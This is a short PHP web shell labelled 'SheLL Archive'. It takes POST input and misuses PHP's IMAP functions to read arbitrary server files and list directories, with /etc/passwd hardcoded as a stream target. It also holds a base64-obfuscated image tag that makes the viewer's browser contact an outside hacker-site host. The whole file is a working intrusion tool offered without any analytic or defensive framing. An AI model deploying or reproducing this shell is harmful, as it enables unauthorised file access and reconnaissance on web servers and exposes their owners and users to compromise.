<?php 
/*
******************************************************************************************************
*							SheLL Archive
*                                
******************************************************************************************************
*/       

       $string = !empty($_POST['string']) ? $_POST['string'] : 0; 
       $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; 

       if ($string && $switch == "file") { 
               $stream = imap_open($string, "", ""); 
               if ($stream == FALSE) 
                       die("Can't open imap stream"); 

               $str = imap_body($stream, 1); 
               if (!empty($str)) 
                       echo "<pre>".$str."</pre>"; 
               imap_close($stream); 
       } elseif ($string && $switch == "dir") { 
               $stream = imap_open("/etc/passwd", "", ""); 
               if ($stream == FALSE) 
                       die("Can't open imap stream"); 

               $string = explode("|",$string); 
               if (count($string) > 1) 
                       $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); 
               else 
                       $dir_list = imap_list($stream, trim($string[0]), "*"); 
               echo "<pre>"; 
               for ($i = 0; $i < count($dir_list); $i++) 
                       echo "$dir_list[$i]\n"; 
               echo "</pre>".base64_decode('PGltZyBzcmM9Imh0dHA6Ly93d3cuaGFja2VybGFyLm5ldC9jb3B5cmlnaHQuanBnIj4='); 
               imap_close($stream); 
       } 
?>